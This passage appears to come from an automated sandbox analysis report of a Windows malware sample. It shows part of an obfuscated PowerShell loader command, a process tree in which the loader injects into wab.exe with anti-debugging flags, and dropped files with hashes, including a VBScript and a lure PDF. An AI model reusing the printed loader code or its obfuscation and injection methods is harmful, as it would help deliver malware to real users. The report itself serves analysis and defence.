SpecSUndere OikocReveruCragsrKermeiI,dvitVulneyDygtiPCy,lorT,biro.ejrftKondioStillcB.ibeointralF,yenTLakkey ekrnpBedrieJe ni]Combi:D.nax: Eft,Tc gnalSafets Knud1Paste2Undul ');$progressions=$Glutition240[0];$Deliciousness= (Volplanes 'Mor.i$SkrifgSca.elFril,o Ufo,bMa era HypolA.ari: LedeL,phodnMoskgnNed liSplinnRavivgStoles Repadpekina BomrgT.anaeTr.sssUnspi=ap,esNSorg,e P,sew Chro-Imbo OdobbebParo jTvisteorgancPhaent Poit Udtr S.ackpy Henrs smaatF rreeRhizomForst.UdvikNTvrdrePe,chtHygro.Ka.beWTak feva sobOmstbClsseklKvadri Serre StilnDelirt');$Deliciousness+=$Brnefdselsdag[1];Tilhre ($Deliciousness);Tilhre (Volplanes ' Mund$ConceLKadminPie.enStudeiSelvbnGallogSemimsOverrd Prova.utopg Fejle AvansOrtho.P.ogrHKaerle Bnknaef,rgdSyllaeForr.r.renesHatch[Rumor$HieroTAd,norTioloaTandbnUndersEtablfSkaleoDeklarAfs,emThe yaT,hanbvinkliHa malRashei,ndvetgy.nay Bila]Taetd=Ombes$cho otTegnfaIdiosi,aabel vaunfU deroHjer,rpsitteDrawlm PrinoCent.sHandetsp.in ');$Benzinautomaten=Volplanes 'Kvote$,nfraLF,netnK.rsunDisiniCheninSafragNursisSkuffdChequaskygngKanoneTa nesSvvef.CamouDU baso PyntwLegalnSi ralPen.eopresuasondedKonfeF Ca,iiFor alSe,mie Silk(Par,l$Frstep UslurPenstohusmagPartirBetaleMollysTrembsSpritifeltmo .alkn CounsHarce,stile$u,uguTLokaleAdhregFo prnSublueMit.rbTombagNe,gae Gradr Tids)domne ';$Tegnebger=$Brnefdselsdag[0];Tilhre (Volplanes 'Co,li$Revolg KinglDirekoV,deobWindbaPrydelAirsc: Us aG.eoloi fgifvFortraNajadb .ryslAntise,umbl= Over(MastiTGranueChrissBurgot Fers-FantaP MuncaFilkotUngaihChurn ersk$UnderTBrn.peRter gMist.n KerneMethab Indfg StopeRrdamrnosog)Kog.i ');while (!$Givable) {Tilhre (Volplanes 'Point$Sociog GarvlMucouoc stob fremaSolinlVisse: IsceMRegi eBeb,dkSuperaDe,ignBr,kni Datas OrigeUninfrDesexeFjereno.isod ,visesta,ksSpice= Axop$S,abrtIrrearRolpeuConjueJeron ') ;Tilhre $Benzinautomaten;Tilhre (Volplanes 'indskSPrsentMaskia oaxerByldetVi eo-VenteSTonenlRec,ge,nstneS,rvipecard Dropw4Morg, ');Tilhre (Volplanes 'Tilke$AngiagCellolSnoedo Tastb ScraaPlintlAntib:WaterGassyriMongovGall,aPreapbSkemal ucieCorme=Ju,ic(EpithTOr,aneScr,bsAu ibtFrs.o- akuuPNecroaDragntM,delhUdfor Une a$.orbeTKlar.e elefg.negrnThunde Je.nb DeligWe sheIntrorFlank) To a ') ;Tilhre (Volplanes ' I du$ArbejgPseudlFolkeoForfrb SatsaLserflSuper:PhysiBWashsrKlatmuTomaemNrhedaf.ihel,lanoiSels.aChant=Unde $BesttgOerstlUncono tippbBetdsaF.cetlIsblo:saha SKommaaStuddmsyn,elDisc,iMyalln unexgPassisStrugrMejsleEgaligThe peIffymr,lostifishsnBlencgHaanee grnsn Mats+An.if+Sple.%Fejes$kongeGWestelBesseuEnthutSjofei Slv.tUnshaiPlagioVoldgnBa,eo2Bankk4 udby0Bouch.subclcParieoYor euSpindnDepontFresk ') ;$progressions=$Glutition240[$Brumalia];}$Existimation=345476;$Basigenous=28090;Tilhre (Volplanes 'Rhodi$Tima gTastal U,mioOverwblukkeaSportlKorre:ByretH C iroCottomM,byeos.otjn SagsyFortum.nproeTryllt lekssAffal odon=Blaam RegntG T,rkeTerzitdrago-CiselC polioc emonHadjitIn ideClu.pntri,utUlydi Bev $ScogiTElimieEst ogBemocnTowbaeReleabSupergNui.oeRadiar Barr ');Tilhre (Volplanes 'Hurs,$Mis.egHeppll ,erroPeritbFllesad.gtil Traf:BadevA uldmnMicrosOpt,eeBrev.eForhnnSmiledInflueOrphesRelea Ignor=Off.e Malle[ Ce.tSLujulyMotilsFarfdtKendeeAtweemcytas.ComprCSquamoLocksnFinanv QueneTakvirMace t ,att]Cripe:Inset: ,etsFr.styrAcepho RegrmOffenB Addua F,ass .vlveDeadf6Tre.o4 Sa tSStigntAfmnsrDobbei P,lonafstag Over(Z,nur$EndoaHEksemoIn ermForedoRootsnIntroyStamfmLut.aeTyll.tStablsStat,)proto ');Tilhre (Volplanes 'snr,l$.yplagUnprel .aveoBogklb,rerfaPrecol onoc:typesCUniceeimperm BorteTota t OutleTendorAerohiPrecaaBonnilBevog Disc=Unsin Pomf [ProgrSSynkryDeafns .icrtNytteePerdem arty.Welc,TGrasseSmig,xEfte t M.df. s,afEVarsknTeorecDk,etoAmbigdDecimiNeutrn SiligU,ens].arts:frate: blitARispaSarbitCChazyIFrydeIKu.ti.Bonn.G Aft,eBa,ehtMudreSSva,etLagerr DissiVarefnToparg,fsko(Rnebl$RaabeASkol.nSalvas P rteAfsaleOptegnSkramdSighteDeputs Flso)Hklet ');Tilhre (Volplanes 'Reli.$ Gorgg El.clEonscoTrabebFlu da Utakl Haar:cape,P,eminu.irekrT.nnipAtmialCompeeBero.wMo,ryoromauo amtsdTum l=Blush$NeuraC WeddeVe tkm Ruteel,etmtOms re,upinrBruttisklsaaApp,ylStr p.v talsduponuunspebHa.kesIntittPrestrKrigsi Spadn Fr mgFra.t(Guldd$Gyn,nE,nvibxaphesiFr.nksLituitBuazeiTimbemDommeaOl.sttKandiiElectoMollinMoxie, Gear$FundeBOpstvaKenotsSejrsiSkarng probe Clocni nicoSte kusulfisTinge)Sko s ');Tilhre $Purplewood;"
                          5⤵
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1424
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Visiteres.Hud && echo t"
                            6⤵
                              PID:5000
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe"
                              6⤵
                              • Suspicious use of NtCreateThreadExHideFromDebugger
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:5772
                  • C:\Windows\System32\CompPkgSrv.exe
                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                    1⤵
                      PID:6116

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                      Filesize

                      36KB

                      MD5

                      b30d3becc8731792523d599d949e63f5

                      SHA1

                      19350257e42d7aee17fb3bf139a9d3adb330fad4

                      SHA256

                      b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                      SHA512

                      523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                      Filesize

                      56KB

                      MD5

                      752a1f26b18748311b691c7d8fc20633

                      SHA1

                      c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                      SHA256

                      111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                      SHA512

                      a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                      Filesize

                      64KB

                      MD5

                      f3f9d8d254b15336935cf840a5161486

                      SHA1

                      0586a1b5cdc2e71fbafb02eb6baebeb7d24297cb

                      SHA256

                      7718690b4e819b065b687e03571593ea0043168d42f0df6457ba28153c47cf93

                      SHA512

                      8806f7268b09f271c3485ed1db4cad0e7e6ead6c23fd59dcf867f1c06f1a2d9118e6a6dc091dfb84700b2767d19653848a4b7bf5c5aee36ee39af2661770d7a4

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                      Filesize

                      2KB

                      MD5

                      440cb38dbee06645cc8b74d51f6e5f71

                      SHA1

                      d7e61da91dc4502e9ae83281b88c1e48584edb7c

                      SHA256

                      8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                      SHA512

                      3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      1KB

                      MD5

                      d4ff23c124ae23955d34ae2a7306099a

                      SHA1

                      b814e3331a09a27acfcd114d0c8fcb07957940a3

                      SHA256

                      1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

                      SHA512

                      f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\List of Required items and services\List of Required items and services.pdf
                      Filesize

                      760KB

                      MD5

                      74d3cbcc54fa583bf0dda175b3b26a47

                      SHA1

                      4c215cf29300f2dbf67f3c22630be7feb6d9ddf2

                      SHA256

                      f5c2eed0a44bb650a459b3aebe243ec968bc2546e3b73315436ec8a8887e1876

                      SHA512

                      a6344866cd98b0e67701a2065b4e062821962f985ad38f78b665b805965b55a56a65024b1351d49c46fb9d1b4dfa275ea77f8868a0429699bbf95c1a9c8cd99a

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ifurrxsv.5sx.ps1
                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Visiteres.Hud
                      Filesize

                      486KB

                      MD5

                      d298368760f646f852027f697df07ee6

                      SHA1

                      a77b8b2f2d4fef42662325fb3faff5f1464875c3

                      SHA256

                      e28f743e72a30f5d50ee7606d68df5fdcb6bf217a5220e1c9ba57133d0f8c195

                      SHA512

                      1ded179ebde62b8e79e3ca39b187d7756da1d6dbdafb706d291d804b5308e9a93a6c900876b1bdc0c72de187e689d3dbd2ee8257f0279856fa655f5c244d0fcf

                      Download Submit

                    • C:\Users\Public\yd2.vbs
                      Filesize

                      158KB

                      MD5

                      d19a4c4b7be7f5ad5187433ece99115c

                      SHA1

                      d7e82148cabbcebaffdf9cde6ab981a8c8e95971

                      SHA256

                      ece154e70e68d781e49b57c63684841be61646a0c3cb9e91102db3041d7ceeb5

                      SHA512

                      6188b33cbaa54fbf2cbd2485ab4f093480b6468968912c720181207261fb9ccd0712f92226d766cf3fb6bc97cb001b9454af3c38900be0296c9b31c3acc1e2b6

                      Download Submit

                    • memory/1424-92-0x0000000007400000-0x0000000007A7A000-memory.dmp

                      Filesize

                      6.5MB

                      Download

                    • memory/1424-87-0x00000000058C0000-0x0000000005C14000-memory.dmp

                      Filesize

                      3.3MB

                      Download

                    • memory/1424-93-0x0000000006330000-0x000000000634A000-memory.dmp

                      Filesize

                      104KB

                      Download

                    • memory/1424-73-0x0000000004F00000-0x0000000005528000-memory.dmp

                      Filesize

                      6.2MB

                      Download

                    • memory/1424-74-0x0000000005640000-0x0000000005662000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/1424-75-0x00000000056E0000-0x0000000005746000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/1424-76-0x0000000005750000-0x00000000057B6000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/1424-96-0x0000000008030000-0x00000000085D4000-memory.dmp

                      Filesize

                      5.6MB

                      Download

                    • memory/1424-90-0x0000000005D90000-0x0000000005DAE000-memory.dmp

                      Filesize

                      120KB

                      Download

                    • memory/1424-94-0x0000000007060000-0x00000000070F6000-memory.dmp

                      Filesize

                      600KB

                      Download

                    • memory/1424-72-0x00000000024A0000-0x00000000024D6000-memory.dmp

                      Filesize

                      216KB

                      Download

                    • memory/1424-111-0x00000000085E0000-0x000000000E0F9000-memory.dmp

                      Filesize

                      91.1MB

                      Download

                    • memory/1424-91-0x0000000005E40000-0x0000000005E8C000-memory.dmp

                      Filesize

                      304KB

                      Download

                    • memory/1424-95-0x0000000006FF0000-0x0000000007012000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/2448-14-0x00007FFF2C150000-0x00007FFF2CC11000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/2448-15-0x00007FFF2C150000-0x00007FFF2CC11000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/2448-37-0x00007FFF2C150000-0x00007FFF2CC11000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/2448-13-0x00007FFF2C150000-0x00007FFF2CC11000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/2448-8-0x000001E34CBE0000-0x000001E34CC02000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/2448-2-0x00007FFF2C153000-0x00007FFF2C155000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/5772-207-0x0000000001000000-0x0000000002254000-memory.dmp

                      Filesize

                      18.3MB

                      Download

                    • memory/5772-202-0x0000000001000000-0x0000000002254000-memory.dmp

                      Filesize

                      18.3MB

                      Download

                    • memory/5772-203-0x0000000001000000-0x0000000002254000-memory.dmp

                      Filesize

                      18.3MB

                      Download